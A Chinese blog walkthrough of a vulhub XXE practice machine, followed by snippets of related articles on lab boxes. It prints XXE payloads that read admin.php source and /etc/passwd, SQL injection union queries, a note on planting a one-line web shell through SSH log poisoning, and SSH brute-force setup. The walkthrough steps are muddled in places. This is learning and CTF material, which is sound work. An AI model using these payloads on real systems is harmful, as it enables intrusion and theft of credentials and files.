vulhub xxe靶机

2024-08-29 19:20
文章标签 靶机 vulhub xxe

本文主要是介绍vulhub xxe靶机,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

步骤一,访问浏览器

步骤二,输入/robots.txt

步骤三,发现存在用户登录的一个界面/xxe

我们登录进去

步骤四,随便输入一个数字或者字母打开BP

抓到包之后发送的重放器里边

通过抓包发现是XML数据提交

步骤五,通过php://filter读取admin.php的文件源码

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>

复制一下发送过去的一堆码

步骤六,复制完下面的话进行Base64编码

步骤七,得到用户名和密码,经过分析可知密码是通过MD5格式加密的

步骤八,输入/xxe/admin.php进行登录

步骤九,点击flag

点击完之后它会跳转的这个页面

步骤十,进行抓包读取fiagmeout.php

然后在Base64解码

JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5

然后在用Base32解码

然后在用Base64解码

.....这次可真没了,晕的

步骤十一,在使用BP来读取 flagmeout.php 文件

<!DOCTYPE foo [
<!ENTITY admin SYSTEM "file:///etc/.flag.php" > ]

步骤十二,复制代码,新建一个名为flag.php文档粘贴进去,加PHP语句

步骤十三,把 php 文档放在 phpstudy 的 WWW目录中,开启 phpstudy.最后用浏览器去访问这个文件。

{xxe_is_so_easy}就是flag

这篇关于vulhub xxe靶机的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1118691

相关文章

vulhub GhostScript 沙箱绕过(CVE-2018-16509)

1.执行以下命令启动靶场环境并在浏览器访问 cd vulhub/ghostscript/CVE-2018-16509 #进入漏洞环境所在目录   docker-compose up -d #启动靶场   docker ps #查看容器信息 2.访问网页 3.下载包含payload的png文件 vulhub/ghostscript/CVE-2018-16509/poc.png at

【vulhub】thinkphp5 2-rce 5.0.23-rce 5-rce 漏洞复现

2-rec 1.启动环境  cd /.../vulhub/thinkphp/2-rce # cd进入2-rce靶场文件环境下docker-compose up -d # docker-compose启动靶场docker ps -a # 查看开启的靶场信息 2.访问192.168.146.136:8080网页 3.构造payload http

检测XXE漏洞的工具

免责声明此文档仅限于学习讨论与技术知识的分享,不得违反当地国家的法律法规。对于传播、利用文章中提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任,一旦造成后果请自行承担!您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。 为了检测XXE(XML外部实体)漏洞,可以使用多种工具。以下是一些专门用于检测XX

tomato靶机通关攻略

主机发现  用kali去扫描端口,发现有3个开放端口 访问网站    在kali里面进行目录扫描,找到一个antibot_image   找到一个/antibot_image/ 目录,进而找到/antibots/目录  发现可能存在文件包含    页面通过image传参查看passwd文件  页面通过image传参查看日志文件   将一句话木马作为ssh登录的用户

XXE payload总结

前言 关于XXE相关的一些payload的总结记录,更侧重于实战直接拿来测试利用,而非CTF绕WAF。。。 Classic XXE <?xml version="1.0"?><!DOCTYPE data [<!ELEMENT data (#ANY)><!ENTITY xxe SYSTEM "file:///etc/passwd">]><data>&xxe;</data> 可读文

.hackme靶机通关攻略

第一步查找ip 通过御剑扫描到IP进入尝试 成功找到靶场 步骤二来到这个靶场注册登录 进来点一下提交出来书名 只有一个框框那就来试试sql注入 1’ and 1=2 --+ 然后查看数据库 -1' union select database(),2,3 # 查看数据库表名 -1' union select group_concat(table_name),2,3

hackme靶机通关攻略

1、登录靶机,查询是否有注入点 2、判断闭合方式 输入OSINT' and 1=1 # 输入OSINT' and 1=2 # 得出闭合方式为单引号 2、查询数据库名 输入-1' union select database(),2,3 # 3、查询数据库中的表 输入-1' union select group_concat(table_name),2,3 from informa

自搭靶机实现SSH爆破复现记录

编写脚本实现ssh爆破。可使用paramiko、pexpect、pxssh等Python模块进行编写。但在ssh服务端将配置加密方式为非常用加密方式3des-cbc,端口为9981端口。 创建 了一个新的Kali虚拟机作为靶机,使用原本的Kali作为攻击机。 设置一个用户为target1234,用户密码为targetpasswd123。 root用户为kaliTarget: 登录进去后

web渗透:XXE漏洞

XXE漏洞的原理 XXE(XML External Entity Injection)漏洞是由于应用程序在解析XML输入时,没有正确处理外部实体(External Entities)的引用而产生的安全漏洞。XML外部实体可以引用本地或远程的内容,攻击者可以通过构造恶意的XML输入,利用外部实体引用来读取文件、执行系统命令等。 XXE漏洞的危害 XXE漏洞可以导致多种安全威胁,包括但不限于:

sickos 靶机渗透(wolf cms 渗透,squid 代理)

靶机信息 vulnhub靶机 主机发现 192.168.50.152 为靶机Ip ┌──(kali㉿kali)-[~/testSickos]└─$ sudo nmap -sn 192.168.50.0/24[sudo] password for kali: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 09:56 C